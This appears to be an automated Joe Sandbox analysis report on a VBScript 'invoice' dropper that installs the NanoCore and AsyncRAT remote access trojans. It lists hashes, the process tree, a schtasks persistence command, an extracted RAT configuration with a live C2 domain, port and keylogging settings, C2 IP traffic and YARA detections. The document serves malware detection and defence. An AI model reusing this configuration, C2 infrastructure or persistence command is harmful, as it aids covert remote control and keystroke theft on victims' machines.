Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Invoice No F1019855_PDF.vbs

Overview

General Information

Sample Name:Invoice No F1019855_PDF.vbs
Analysis ID:404165
MD5:ce4dcec84bfeba49404fa70f5d137645
SHA1:c31021953c59af126d0095bea70c26ca02a2d954
SHA256:ca85b069b028fc30a2af436344eae332ad6afe8a7e3904a48ee63948ab6c3133
Tags:NanoCoreRATvbs
Infos:

Most interesting Screenshot:

Detection

Nanocore AsyncRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected Nanocore RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Potential malicious VBS script found (has network functionality)
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 6428 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Invoice No F1019855_PDF.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • ame.exe (PID: 6592 cmdline: 'C:\Users\user\AppData\Local\Temp\ame.exe' MD5: F7F64EC1756119F19D52FB140E22382F)
      • wscript.exe (PID: 6700 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
        • schtasks.exe (PID: 5544 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc onlogon /rl highest /tn Notepads.exe /tr 'C:\Users\user\AppData\Roaming\Notepads.exe MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
          • conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • Notepads.exe (PID: 5444 cmdline: 'C:\Users\user\AppData\Roaming\Notepads.exe' MD5: F7F64EC1756119F19D52FB140E22382F)
    • fi.exe (PID: 6616 cmdline: 'C:\Users\user\AppData\Local\Temp\fi.exe' MD5: 86A588C5A10A04AF998DBAD9FF9A31D1)
  • dhcpmon.exe (PID: 6952 cmdline: 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' MD5: 86A588C5A10A04AF998DBAD9FF9A31D1)
  • Notepads.exe (PID: 2152 cmdline: C:\Users\user\AppData\Roaming\Notepads.exe MD5: F7F64EC1756119F19D52FB140E22382F)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "ac555290-50d4-4120-9390-e76e4f94", "Group": "Start Up", "Domain1": "sys2021.linkpc.net", "Domain2": "", "Port": 11940, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4ibx53ALvuTHC2wskqA=="}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\fi.exeNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x1018d:$x1: NanoCore.ClientPluginHost
  • 0x101ca:$x2: IClientNetworkHost
  • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
C:\Users\user\AppData\Local\Temp\fi.exeNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0xff05:$x1: NanoCore Client.exe
  • 0x1018d:$x2: NanoCore.ClientPluginHost
  • 0x117c6:$s1: PluginCommand
  • 0x117ba:$s2: FileCommand
  • 0x1266b:$s3: PipeExists
  • 0x18422:$s4: PipeCreated
  • 0x101b7:$s5: IClientLoggingHost
C:\Users\user\AppData\Local\Temp\fi.exeJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    C:\Users\user\AppData\Local\Temp\fi.exeNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0xfef5:$a: NanoCore
    • 0xff05:$a: NanoCore
    • 0x10139:$a: NanoCore
    • 0x1014d:$a: NanoCore
    • 0x1018d:$a: NanoCore
    • 0xff54:$b: ClientPlugin
    • 0x10156:$b: ClientPlugin
    • 0x10196:$b: ClientPlugin
    • 0x1007b:$c: ProjectData
    • 0x10a82:$d: DESCrypto
    • 0x1844e:$e: KeepAlive
    • 0x1643c:$g: LogClientMessage
    • 0x12637:$i: get_Connected
    • 0x10db8:$j: #=q
    • 0x10de8:$j: #=q
    • 0x10e04:$j: #=q
    • 0x10e34:$j: #=q
    • 0x10e50:$j: #=q
    • 0x10e6c:$j: #=q
    • 0x10e9c:$j: #=q
    • 0x10eb8:$j: #=q
    C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x1018d:$x1: NanoCore.ClientPluginHost
    • 0x101ca:$x2: IClientNetworkHost
    • 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    Click to see the 5 entries

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x1014d:$x1: NanoCore.ClientPluginHost
    • 0x1018a:$x2: IClientNetworkHost
    • 0x13cbd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
      • 0xfeb5:$a: NanoCore
      • 0xfec5:$a: NanoCore
      • 0x100f9:$a: NanoCore
      • 0x1010d:$a: NanoCore
      • 0x1014d:$a: NanoCore
      • 0xff14:$b: ClientPlugin
      • 0x10116:$b: ClientPlugin
      • 0x10156:$b: ClientPlugin
      • 0x1003b:$c: ProjectData
      • 0x10a42:$d: DESCrypto
      • 0x1840e:$e: KeepAlive
      • 0x163fc:$g: LogClientMessage
      • 0x125f7:$i: get_Connected
      • 0x10d78:$j: #=q
      • 0x10da8:$j: #=q
      • 0x10dc4:$j: #=q
      • 0x10df4:$j: #=q
      • 0x10e10:$j: #=q
      • 0x10e2c:$j: #=q
      • 0x10e5c:$j: #=q
      • 0x10e78:$j: #=q
      00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x1021d:$x1: NanoCore.ClientPluginHost
      • 0x1025a:$x2: IClientNetworkHost
      • 0x13d8d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        Click to see the 52 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        7.2.dhcpmon.exe.424e434.4.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
        • 0xd9ad:$x1: NanoCore.ClientPluginHost
        • 0xd9da:$x2: IClientNetworkHost
        7.2.dhcpmon.exe.424e434.4.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
        • 0xd9ad:$x2: NanoCore.ClientPluginHost
        • 0xea88:$s4: PipeCreated
        • 0xd9c7:$s5: IClientLoggingHost
        7.2.dhcpmon.exe.424e434.4.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
          3.0.ame.exe.500000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
            1.2.wscript.exe.16c170d0090.5.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
            • 0xe38d:$x1: NanoCore.ClientPluginHost
            • 0xe3ca:$x2: IClientNetworkHost
            • 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
            Click to see the 72 entries

            Sigma Overview

            AV Detection:

            barindex
            Sigma detected: NanoCoreShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\fi.exe, ProcessId: 6616, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

            E-Banking Fraud:

            barindex
            Sigma detected: NanoCoreShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\fi.exe, ProcessId: 6616, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

            System Summary:

            barindex
            Sigma detected: WScript or CScript DropperShow sources
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs' , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\ame.exe' , ParentImage: C:\Users\user\AppData\Local\Temp\ame.exe, ParentProcessId: 6592, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\tmp4DD8.tmp.vbs' , ProcessId: 6700

            Stealing of Sensitive Information:

            barindex
            Sigma detected: NanoCoreShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\fi.exe, ProcessId: 6616, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

            Remote Access Functionality:

            barindex
            Sigma detected: NanoCoreShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\fi.exe, ProcessId: 6616, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\Notepads.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen7
            Source: C:\Users\user\AppData\Local\Temp\ame.exeAvira: detection malicious, Label: TR/Dropper.Gen
            Source: C:\Users\user\AppData\Local\Temp\fi.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen7
            Found malware configurationShow sources
            Source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "ac555290-50d4-4120-9390-e76e4f94", "Group": "Start Up", "Domain1": "sys2021.linkpc.net", "Domain2": "", "Port": 11940, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4ibx53ALvuTHC2wskqA=="}
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeVirustotal: Detection: 81%Perma Link
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeMetadefender: Detection: 90%Perma Link
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeReversingLabs: Detection: 100%
            Source: C:\Users\user\AppData\Local\Temp\ame.exeVirustotal: Detection: 62%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\ame.exeReversingLabs: Detection: 75%
            Source: C:\Users\user\AppData\Local\Temp\fi.exeVirustotal: Detection: 81%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\fi.exeMetadefender: Detection: 90%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\fi.exeReversingLabs: Detection: 100%
            Source: C:\Users\user\AppData\Roaming\Notepads.exeReversingLabs: Detection: 75%
            Multi AV Scanner detection for submitted fileShow sources
            Source: Invoice No F1019855_PDF.vbsVirustotal: Detection: 29%Perma Link
            Source: Invoice No F1019855_PDF.vbsReversingLabs: Detection: 23%
            Yara detected Nanocore RATShow sources
            Source: Yara matchFile source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: fi.exe PID: 6616, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED
            Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
            Source: Yara matchFile source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.3832a5d.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.42495fe.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f70000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.0.fi.exe.40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f74629.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.40000.0.unpack, type: UNPACKEDPE
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\Notepads.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\ame.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\fi.exeJoe Sandbox ML: detected
            Source: 7.2.dhcpmon.exe.c40000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
            Source: 7.0.dhcpmon.exe.c40000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
            Source: 3.0.ame.exe.500000.0.unpackAvira: Label: TR/Dropper.Gen
            Source: 26.0.Notepads.exe.ee0000.0.unpackAvira: Label: TR/Dropper.Gen
            Source: 30.0.Notepads.exe.f40000.0.unpackAvira: Label: TR/Dropper.Gen
            Source: 4.2.fi.exe.4f70000.10.unpackAvira: Label: TR/NanoCore.fadte
            Source: 4.0.fi.exe.40000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
            Source: 4.2.fi.exe.40000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
            Source: C:\Users\user\AppData\Local\Temp\fi.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
            Source: Binary string: mscorrc.pdb source: fi.exe, 00000004.00000002.600584281.0000000004C80000.00000002.00000001.sdmp

            Networking:

            barindex
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs:
            Source: Malware configuration extractorURLs: sys2021.linkpc.net
            Connects to many ports of the same IP (likely port scanning)Show sources
            Source: global trafficTCP traffic: 79.137.109.121 ports 10090,0,1,4,9,11940
            Potential malicious VBS script found (has network functionality)Show sources
            Source: Initial file: zwLVbUFwZBZDbceUVAyKvSBZdGeuAMSuHWmohNPWzxPYjBKvHpkhxtBhvlsVpKwMjfvEpqnIkbKy.SaveToFile McuWOdLbqYeOPYiwaFEVWWSHoCSCcVdBKrzPZgVwoyASExZvjebwLKVpJnhMKIyUvcEXZTWtkIgY, JOszibYTglCXKYlUnHXtDSXmFsBPOvOQNEqqQpHaihrCgJSzpLUmlsiqrFtpZIElXmJGhvEx
            Source: global trafficTCP traffic: 192.168.2.6:49716 -> 79.137.109.121:11940
            Source: global trafficTCP traffic: 192.168.2.6:49725 -> 191.96.25.26:11940
            Source: Joe Sandbox ViewIP Address: 79.137.109.121 79.137.109.121
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownTCP traffic detected without corresponding DNS query: 191.96.25.26
            Source: unknownDNS traffic detected: queries for: sys2021.linkpc.net
            Source: ame.exe, 00000003.00000002.537233135.0000000002BC0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected AsyncRATShow sources
            Source: Yara matchFile source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.325883789.0000016C16535000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.547269938.0000000012956000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.329227770.0000000000502000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000000.533439085.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.592748395.0000000000EE2000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000002.575722228.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.325568596.0000016C16534000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001E.00000000.540116031.0000000000F42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.533753846.0000000000502000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: ame.exe PID: 6592, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Notepads.exe PID: 5444, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Notepads.exe PID: 2152, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Notepads.exe, type: DROPPED
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\ame.exe, type: DROPPED
            Source: Yara matchFile source: 3.0.ame.exe.500000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c1711f630.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.0.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c1711f630.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.129567e0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.0.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 30.2.Notepads.exe.f40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.Notepads.exe.ee0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.500000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.3.wscript.exe.16c165eefd0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ame.exe.129567e0.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.raw.unpack, type: UNPACKEDPE
            Contains functionality to log keystrokes (.Net Source)Show sources
            Source: ame.exe.1.dr, Client/Handle_Packet/HandleLimeLogger.cs.Net Code: KeyboardLayout
            Source: Notepads.exe.3.dr, Client/Handle_Packet/HandleLimeLogger.cs.Net Code: KeyboardLayout
            Source: 3.2.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs.Net Code: KeyboardLayout
            Source: 3.0.ame.exe.500000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs.Net Code: KeyboardLayout
            Source: 26.0.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs.Net Code: KeyboardLayout
            Source: 26.2.Notepads.exe.ee0000.0.unpack, Client/Handle_Packet/HandleLimeLogger.cs.Net Code: KeyboardLayout
            Source: fi.exe, 00000004.00000002.594266413.0000000000808000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: fi.exe, 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

            E-Banking Fraud:

            barindex
            Yara detected Nanocore RATShow sources
            Source: Yara matchFile source: 00000001.00000003.325858053.0000016C141F0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.336048094.0000016C170D0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.375251510.0000000003201000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.600839165.0000000004F70000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.374117540.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000003.326079423.0000016C173D1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.375293411.0000000004201000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.355766753.0000000000C42000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000000.330048475.0000000000042000.00000002.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.599666904.000000000381A000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: fi.exe PID: 6616, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 6428, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6952, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\fi.exe, type: DROPPED
            Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
            Source: Yara matchFile source: 7.2.dhcpmon.exe.424e434.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.wscript.exe.16c170d0090.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.4f70000.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.0.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.382e434.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.38295fe.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.c40000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fi.exe.382e434.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.424e434.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.dhcpmon.exe.4252a5d.2.raw.unpack, type: UNPACKEDPE
